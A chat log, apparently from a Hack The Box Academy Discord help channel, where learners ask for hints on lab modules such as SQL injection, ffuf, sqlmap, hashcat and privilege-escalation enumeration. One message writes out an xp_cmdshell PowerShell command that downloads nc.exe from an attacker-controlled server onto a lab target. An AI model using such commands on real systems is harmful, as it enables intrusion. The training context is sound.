Task: in the 'titles' table, what is the number of records WHERE the employee number is greater than 200000 OR their title does NOT contain 'engineer'?
My request: SELECT * FROM titles WHERE title != 'engineer' OR emp_no > 200000;
But it doesnt working...
Somebody can help me?

#

Also tried: Select * from titles where title != 'Engineer' || emp_no > 200000;

#

But the answers isn't correct

summer lake
#

So it doesn't exactly just mean the string 'Engineer'

#

So what do you think is next?

twin raft
#

Isn't with the != Excluding the 'Engineer'? ๐Ÿค”

summer lake
#

yes

#

But just using != Engineer is only checking the exact string

#

what did you learn before this? what does % do?

twin raft
#

Is the "like" operator

summer lake
#

yes

twin raft
#

I think if i use "%Engineer%" maybe it works right?

summer lake
#

Combined with?

#

so

#

if you use != %********?

#

give it a shot

twin raft
#

Okay, let me try

twin raft
summer lake
#

sure

steel flume
#

okey the more i work with getting started, the more i get a sense it's slightly outdated

#

anyone i can ask for some guidance on the getting started module?

untold kiln
steel flume
#

okey the issue is that i am on the windows part of getting started

#

it says windows 10 module

#

the link gives me a windows 11

#

virtual machine that is

#

what is the right step?

untold kiln
#

it does not matter if it is a Windows 10 or 11 for the things you need to do

steel flume
#

okey thanks. it's just stuff like that is throwing me for a loop when i am at the start. i hope you understand

lethal atlas
#

has anyone here done intro to network traffic analysis?

quick hollow
#

Help on the question before those two! please been stuck need a slight push

lethal atlas
quick hollow
#

Find and submit the contents of the TXT record as the answer.

lethal atlas
west canopy
#

cheeky clue ๐Ÿ™‚

quick hollow
twin raft
#

I'm trying to login as 'tom' as you see but says successfully logged as 'admin'

drifting knoll
#

@twin raft be careful with spoilers

twin raft
#

Ohhhh sorry that's true

#

Sorry ๐Ÿ™๐Ÿป

drifting knoll
#

np

twin raft
#

Let me think how to do the question right way

#

๐Ÿค”

rustic sage
twin raft
#

Subverting Query Logic

#

I've put my injection in right way i think, but when i do the login it says: "login successful as user: admin"

#

And i don't want to be admin, i want to be tom, and i don't know why this happens ๐Ÿค”

rustic sage
#

Have just tried it my own.

#

You can log in as 'tom' and then you see the flag.

twin raft
rustic sage
#

The app is showing you how your query was sent to SQL

devout cliff
#

can anyone help me with using LinEnum script after getting a reverse shell active on a remote server? the script executes but the output is so long i cant read it all and i cant scroll up to look through it on the remote host.

honest flower
#

good stuffs can be everywhere in the output of the script

devout cliff
#

right but my problem is that its not allowing me to look at all of the output, its getting cut off and only shows the end of the output

honest flower
#

try to put the output in a file

#

./LinEnum.sh | tee "youroutputfile"

devout cliff
#

once i do that i can pull the file off the remote host somehow to my attack box?

#

and then can view it?

honest flower
#

why? you are unable to read the file directly from your target

devout cliff
#

oh i see what you mean

#

i will try this

#

thank you

honest flower
sharp violet
#

Anyone online that could give me a helpful nudge with the Broken Authentication Final Assessment? I can't find any other users.

feral gyro
obsidian hornet
#

Hello, i have a question about the SQLMAP Essentials module, specifically with Case5 question. I am able to perform the process but i am not getting an expected answer. DM's are open if anyone is around so i can more clearly state my question

obsidian hornet
rustic sage
#

Starting Point - Archetype: NetCat issue.
Hey again, I've been having issues running NetCat on starting point tier-II on the Archetype machine.
I try running :
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.155/usr/share/windows-resources/binaries/nc.exe -outfile nc.exe"
What I receive in python3 -m http.server80:
10.129.230.107 - - [24/Jan/2022 21:52:48] code 404, message File not found
10.129.230.107 - - [24/Jan/2022 21:52:48] "GET /nc.exe HTTP/1.1" 404 -
I also tried :
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.155/nc.exe -outfile nc.exe"
What I receive in python3 -m http.server80:
10.129.230.107 - - [24/Jan/2022 21:54:06] "GET /usr/share/windows-resources/binaries/nc.exe HTTP/1.1" 404 -

inland wigeon
#

I wanna install seclists, what is the pass for sudo?

surreal rain
rustic sage
inland wigeon
high tapir
#

Hello lads, are we allowed to share youtube videos here?

gleaming gate
#

nice i cant even access the target

rustic sage
gleaming gate
#

oh i have to do it through that?

#

other times my vm worked fine

#

oh well

rustic sage
gleaming gate
#

No

rustic sage
#

Try deploy it in your VM

#

not host OS

rustic sage
gleaming gate
#

Whatever

#

Lol

rustic sage
#

@gleaming gate Which module and task is this?

gleaming gate
#

File Inclusion > RFI

rustic sage
gleaming gate
#

alright

#

im just gonna use the htb pwnbox

rustic sage
#

๐Ÿคทโ€โ™‚๏ธ

gleaming gate
#

really

#

;-;

#

oh it loaded

#

lfg

#

excuse me

#

i literally do what the section suggests

#

tf

#

Nvm found a way to fix it

#

JUST SHUT UP ALREADY OMFG

prime fulcrum
#

Hi

#

From where I whant to start hacking

rustic sage
gleaming gate
#

most annoying section confirmed

#

Is the section old or smth?

#

NOTHING works

rustic sage
#

It's literally saying Permission denied because you have insufficient perms, I think you know how to fix it

#

lol

gleaming gate
#

insufficient perms?

#

So you mean i need to go sudo?

rustic sage
#

If it says permission denied, most likely yes

gleaming gate
#

what is the password for pwnbox

rustic sage
#

Look on desktop

#

there's a file with credentials

gleaming gate
#

ok found it

#

THATS SO GREAT

#

WINDOWS THING DIDNT WORK EITHER LETS GO

lethal atlas
dry pumice
#

Can someone help me with the "Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer" question of Linux fundamentals ?
I always got the answer 48 and I can't see what's wrong with the command

rustic sage
dry pumice
#

yes, I see but even 47 isn't accept

lethal atlas
rustic sage
#

Can you send your command over in DM? @dry pumice

dry pumice
#

yeah

rustic sage
#

@dry pumice So basically you need to have just the URL on each line and then you can sort it out and count only unique lines. Step one, get just the URL on each line

slow bluff
#

Hi windows priv escla > initial Enumeration> Question: What type of session does this user have? any help i cant get it .. thanks nvm

lethal atlas
#

anyone done Intro to Network Traffic Analysis

lethal atlas
untold kiln
devout cliff
# honest flower you're welcome

just fyi i got past the module, i just think i had an issue upgrading my console once i got the reverse shell. when i redid my whole process today it worked flawlessly and i could scroll/look through all the content i needed to.

muted kite
#

anybody have time to help me finish ffuf?

#

im trying to find a wordlist that doesnt appear as a wordlist or a directory on my system. I tried using the locate command and I get a handful of other wordlists

quaint igloo
#

im trying to

#

but when I run sqlmap

#

it shows that it isn't injectable

#

any tips?

muted kite
#

get em

#

Im not currently in sqlmap right now, i'm in ffuf

feral gyro
muted kite
#

absolutley

#

Im in value fuzzing

#

section, Im reading it

feral gyro
#

u need to create a custom wordlist using the bash oneliner

muted kite
#

that works

#

ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx

#

this doesnt

#

i think im a little confused as to what values I need to replace in that general command above

feral gyro
#

DM me

hasty iris
#

Hello guys I have been having this issue for a bit. I'm doing the OSINT: CORPORATE RECON on academy. In the Domain Structure section. It told me to get the hosting provider for it. I am pretty sure that I have the answer: ||Digital Ocean||. However it isn't accepting that answer. I'm think it might just be formatting issue or something even though I've tried. Also whois network command isn't working. Dig and ping work just find just whois isn't. Has anybody have had this issue. Help would be highly appreciated. Thanks

muted kite
#

I have another question about ffuf, if I cant locate a wordlist in a directory where the exercise says it is located, how do I find it? Or where do I download the list from? I tried the 'locate' command but it doesnt turn up the same path nor the same txt file.

feral gyro
#

locate command will not work in somecases

#

try find

feral gyro
muted kite
#

thanks I will try find this time

feral gyro
#

๐Ÿ‘

coarse mango
#

hello, i seem to be stuck in the file inclusion /directory traversal module. the hardening section. can anyone help?

#

it says to edit the php.ini file to block system() function but the file is owned by root and no write permissions for htb-student so im confused

lethal atlas
# quaint igloo

you need to go back and look at copy as curl. You might also look at part of that section that your sqlmap statement is missing.

lethal atlas
muted kite
lethal atlas
#

are you using pwnbox or your own setup?

odd blade
#

Hello, I am new to HTB and have trouble about windows fundamentals module, the part about NTFS and sharing permissions. I managed to find method for solving problem about firewall but now a new one: SMB1 disabled -- no workgroup available. Help me please๐Ÿ˜ข

odd blade
#

NTFS vs. Share Permissions

livid pier
odd blade
#

I didn't got to the questions, I could not connect to the folder through the smbclient

odd blade
#

yeah

livid pier
# odd blade yeah

like this?
xfreerdp /v:10.129.43.22 /u:htb-student /p:Academy_WinFun!

odd blade
#

yes

livid pier
#

can you show the exact error?

odd blade
#

"SMB1 disabled -- no workgroup available." Also, before this error, there was one more about firewall, usually you need to disable public firewall in windows settings to continue.

livid pier
#

are you using smbclient or xfreedp?

odd blade
#

both. xfreerdp for connecting to windows, and smbclient for connecting to folder

livid pier
#

I think you should be able to answer the problems just using xfreedp

#

then powershell

#

this one is just from reading the section

odd blade
#

but the task says differently. the point is to connect through smbclient to shared problem

livid pier
#

are you talking about this?

odd blade
#

yeah

livid pier
#

you dont need to xfreedb before running the client here

odd blade
#

what do you mean? In the task I need to connect to xfreerdp windows folder (that is shared) through the smbclient

livid pier
#

where does it say that?

#

why would you use smbclient to check shares of a box you are already on?

livid pier
#

Alright I am going to bed. I would reccomend only using smbclient OR xfree, I dont think you need to use both at the same time.
for the 3 questions at the end, all 3 can be answered without using smbclient or xfree, just reading and unserstanding the section. Good luck

rustic sage
#

I am sorry guys but I can not type anywhere else

#

how do I log in into root please ?

#

I tried my password and I tried everything, nothing works

feral gyro
#

on where

#

pwnbox

rustic sage
#

HTB academy

#

I am doing my first challenge

#

I need to add a user but it asks me for a password

#

nothing works

feral gyro
#

sorry on which challenge

rustic sage
#

linux fundamentals

unique valve
feral gyro
#

on which section

unique valve
rustic sage
#

maaan I wasted 1 hours to figue that password out ๐Ÿ˜„

muted kite
mortal pollen
#

Any tips for Cracking Common Passwords from the 'Cracking Passwords with Hashcat' module? I'm stuck since yesterday trying all sorts of rules and modes with no luck...

full wadi
#

Hello! Can anyone help me with the "hacking Wordpress" skill assesment. I am stuck with the shell part. I have a shell up and can run commands like whoami, pwd, ls. But how do i run commands like "ls and a specific folder"?

swift carbon
swift carbon
full wadi
#

@swift carbon I have tried %20 but not sure if that is a space or not. The thing is that i dont get a error message. If i do it in the browser i get a blank page and THE terminal just give me a new Line.

swift carbon
latent haven
#

Hi, I have a question regarding the module 'Information Gathering'.

#

I am being asked : Target: 10.129.214.235

vHosts needed for these questions:
app.inlanefreight.local
dev.inlanefreight.local

#

Which CMS is used on app.inlanefreight.local? (Format: word)

#

I understand that I need to use the tool whatweb to identify the CMS used. However this notion of vHosts drives me crazy

#

I am given an IP address and two subdomains

#

When a send a request to the given IP address, I get the message 'This is the inlanefreight.local default vhost'. I do not understand what those subdomains are, and which domain I should use with whatweb

rustic sage
#

Hi everyone i was just wondering if anyone has done the bug bounty hunter path here? if so how long did it take you/how much time did you put in a day? thanks

livid pier
arctic yarrow
rustic sage
#

cant we connect to target by our own host os?

latent haven
arctic yarrow
latent haven
livid pier
arctic yarrow
# latent haven yes I'm talking about the target IP

Thinking the IP Address is like the address of your home, and the website is accessing one of the port. Thinking port it's like a door, and there is a lot of door. The default for the website is port 80. If you type on your web browser without specifying the port, it will automatically go to port 80. The relation between the vHost and the Target IP is the vHost have the same port in this case port 80. But there is two subdomains, in this case app and dev. Hope that answer your question.

rustic sage
#

so to solve these problem we have to use their instance

livid pier
livid pier
rustic sage
#

i have kali

#

in virtual box

livid pier
#

perfect

rustic sage
#

but i cant ping targert

#

with my host os

livid pier
#

you need that

#

should be next to a question, only need to download once tho

#

then you have to run something like that

#

depending on where you put the file

#

mine is obviously on my desktop

rustic sage
#

i tried that but then also i cant ping

livid pier
#

after a successful connection?

rustic sage
#

hey its working now

livid pier
#

yee!

rustic sage
#

but dint work before

#

thx

livid pier
#

Happy Wednesday!

arctic yarrow
#

It's actually a browser extension that you can install

latent haven
#

however this domain cannot be the target of the tools as it does not even resolve. I believe there's a link between the target IP and this 'app' subdomain

arctic yarrow
#

For me , trying to Google every possible name if it's relevant or not. If you are lucky, then you can find it one.

livid pier
arctic yarrow
slow ruin
#

Hey everyone, I'm stuck on SQLmap essentials - Skills Assessment
I found the attack vector and my sqlmap displayed all the tables within the database however, I am unable to get the contents of the table with the flag. When I run sqlmap now with my working command I get 'Connection refused'

livid pier
#

I could use a hint here

full wadi
#

Hai! Cracking passwords with hashcat skill assesment last question. Download a file crack some hashes and then find the most common password.

Now i managed to track the password or well ish. I get a file with alot of passwords tho just 1 of each password so its quite a few less rows than the original document. I need some assistance where to go from here. Do i miss something while cracking or do i need to compare the files and so on. I rly cant find the help in the module.

full wadi
#

@livid pier yeah that one

livid pier
#

Ok when you run hashcat you should notice it says ~1000 hashes then ~800 unique hashes

#

when you do --show it is showing you the 800 unique passwords

#

thats why it is looking like you are only getting 1 password match

#

What I did was take the og hash list into python and make a dictionary of it. I found the most common hash, then ran that again the cracked hashes I had

full wadi
#

Hmm.. i need to get abit more tech savvy and filter out the hashes first then. Cheers! โœŒ๏ธ

livid pier
#

python split(':')

#

That will help you

#

from collections import Counter

#

will also help to make the dictionary

full wadi
#

Cheers

livid pier
#

yee!

livid pier
#

Anyone around to offer guidance on the cross site scripting final question? -- NVM I got it.

muted kite
#

working, it doesnt return anything

#

i updatedb

rustic sage
muted kite
#

oh really?

rustic sage
# muted kite oh really?

2 stands for stderr - feel free to Google what this is. And then google also what /dev/null is :)

vague axle
#

idk how to set up the vpn for the modules

#

can someone help

livid pier
#

You on kali or pwnbox?

vague axle
#

im on the hackthebox website

#

whats that stuff

muted kite
#

Okay, that makes sense, so when I run the ffuf command to scour the wordlist and I include 2>/dev/null it just idles there with no output

livid pier
vague axle
#

where can i see that?

livid pier
vague axle
#

it says pwnbox base

livid pier
#

pwnbox

muted kite
#

ffuf -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt:FUZZ -u http://academy.htb:30799/ -H 'Host: FUZZ.academy.htb' 2>/dev/null
^Z
zsh: suspended ffuf -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt:FUZZ -u -H 2

vague axle
#

so what now?

livid pier
#

If it is pwnbox you dont need the vpn

#

that box is connected to the module

vague axle
#

then what do i do?

rustic sage
livid pier
vague axle
#

idk how to connect the vpn for it

muted kite
rustic sage
vague axle
livid pier
vague axle
#

k i did that

livid pier
#

click start pwnbox

muted kite
#

For the Top picture when I use the '2>/dev/null' to stop the errors from occuring, it doesnt run the command line at all

vague axle
#

but if i do it with pwnbox i only get 2 hours

livid pier
#

lol well ya that is a whole other problem

vague axle
#

im trying to do openvpn

livid pier
#

I reccomend getting kali

vague axle
#

k

livid pier
#

that would be what you use kali for

limber dock
#

sup i am new here

vague axle
#

so how do i get kali just search for it

livid pier
#

You need to get a virtual box

#

then put kali on it

rustic sage
limber dock
#

first

vague axle
#

btw thx

limber dock
#

its free

vague axle
#

so just a virtual box?

limber dock
muted kite
vague axle
#

is it oracle vm virtual box?

rustic sage
#

@muted kite Ohhhh, OK. Now I understand what you are referring to

limber dock
rustic sage
#

@muted kite You need to filter out your results

livid pier
#

I havent used that but it should work

vague axle
#

which virtual box do i get?

muted kite
limber dock
muted kite
#

im on 2560/5000